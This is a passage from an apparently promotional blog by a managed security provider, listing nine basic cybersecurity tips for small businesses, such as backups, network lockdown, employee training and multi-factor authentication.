cyber protection 24 hours a day, seven days a week, 365 days a year. The cost of this with a traditional employee would be exponentially expensive. It is important to understand all aspects of your contract and to thoroughly investigate the financial aspects of it. Protecting your investment in a business is no different in the process of hiring a Managed Security Service Provider. Due diligence is important during the hiring and evaluating stage, as it provides your business peace of mind and ensures that your Managed Security Service Provider will continue to work as

Your small business is at risk. There’s no way to sugar coat it and no way to say it any more plainly. Every day there are criminals targeting businesses. Why? Because they want your money, they want your private data, or they just want to cause trouble for you. It doesn’t matter what they want. The scary thing is that they can do immense damage to your company in a very short window of time. If ransomware takes control of and encrypts your data, your only recourse is to pay the criminals. But what if you could get ahead of the criminals and enact nine strategies that will enhance your company’s cybersecurity posture? It’s time to take a stand and act BEFORE the bad guys do their damage. These nine cybersecurity tips will help your business be proactive regarding your IT security. #1 – Strengthen Your Payment Gateway With Card Best Practices Your bank and credit card issuers can help you tremendously in the area of IT security for credit and debit cards. They will help you by supplying many of the tools that you need to validate cards and ensure that the cards you process haven’t been compromised by fraud. Part of the credit/debit card cybersecurity best practices is the practice of isolation. By putting your payment systems on a separate computer – even a separate internet connection – then the computers you use for internet use, you lower the risk. Another best practice that revolves around keeping up with cybersecurity technology is the move from magnetic strip readers to chip card or EMV readers. These new EMV readers are now the industry standard, and even small businesses need to comply with this new payment security measure. #2 – Backup Everything Your business cannot operate effectively without access to your data. If you don’t back it up, your data may not be there for you when you need it the most. A busy office creates thousands of files each day, and the secure backup of these files needs to be a part of your company’s cybersecurity strategy. Backups should be made at least daily and mirrored in the cloud or an offsite server. Backup should be overseen by an IT support and IT security professional. Companies like us have the cybersecurity experts that are proficient in handling automatic, secure data backup and recovery for companies large and small. #3 – Get Your Physical Access Points Secured If the bad guys – even bad employees – can just walk into any office in the building and access computers, laptops, tablets, or smartphones, you’re not even close to having bulletproof cybersecurity. You need to ensure that your devices are protected by two-factor authentication and that you use door locks and more sophisticated electronic access systems to prevent entry by unauthorized individuals. Everyone in the company should have their own secure passwords, and admin privileges should only be given to the actual network administrator. #4 – Have Structured Procedures In Place For Mobile Devices The mobile devices that your company employees use can present some unique problems when it comes to cybersecurity. IT security experts routinely point to unsecured mobile devices as the vulnerability used by cyber-criminals to gain access to company networks. Make sure your employees use passwords to protect their smartphones and tablets. Contact an IT security professional – like our cybersecurity experts – to help you with data encryption, secure file synchronization, and secure network access. Cybersecurity experts can help you protect your data with remote wipe capability if your phone is lost or stolen. #5 – Secure Your Entire Website Everyone knows that their sign up forms and check out pages need to be secure, but what about the rest of your company’s website? We’ve all had the experience of going to a business site, only to find that it has been hacked and taken over by malicious cyber-criminals. Don’t let it happen to you. Implement antivirus and anti-spyware software on your computers Do all the updates, upgrades, and patches issued by your operating system developer Bring in an IT security professional to do a vulnerability assessment on a regular basis #6 – Lock Down Your Networks Your network connects all your devices, the internet, and your peripheral devices (like printers). Each device is a point at which a criminal could gain access. Here are some tips. Your internet connection isn’t safe unless you are utilizing a monitored firewall and leveraging the power of encryption. Make sure to hide your company WiFI and use controlled access to customer WiFi. Password protect your router. Disconnect any WiFi enabled devices that you don’t regularly use and security check. #7 – Put Policies in Place to Secure Private Data Your employees should know what the IT security policies of the company are and how to deal with private information. But they won’t unless you specifically take the time and invest in cybersecurity awareness training. Once you have done the training, they should be aware of and be held responsible for following IT security protocols. #8 – Employees Are Your First Line Of Defense Against Cyber-Criminals Employees want to help you secure your business against cyber-crime, but often don’t know that they are letting the bad guys in the front door. By training your employees on topics like phishing, social engineering, ransomware, spyware, and adware, you can drastically reduce your risk. Following that training, employ and cyber security professional to run tests on your employees’ ability to spot these scams and intrusion attempts. #9 – Leverage Strong Passwords And Multi-Factor Identification Your staff should be instructed on what makes for a good password. Better yet, hire an IT security professional to set up multi-factor identification and single sign-on strategies for your business. These cybersecurity tactics can help your employees be more efficient while enabling a higher degree of security for your company. Looking for IT security experts to help your business avoid intrusions, disruptions, and costly downtime?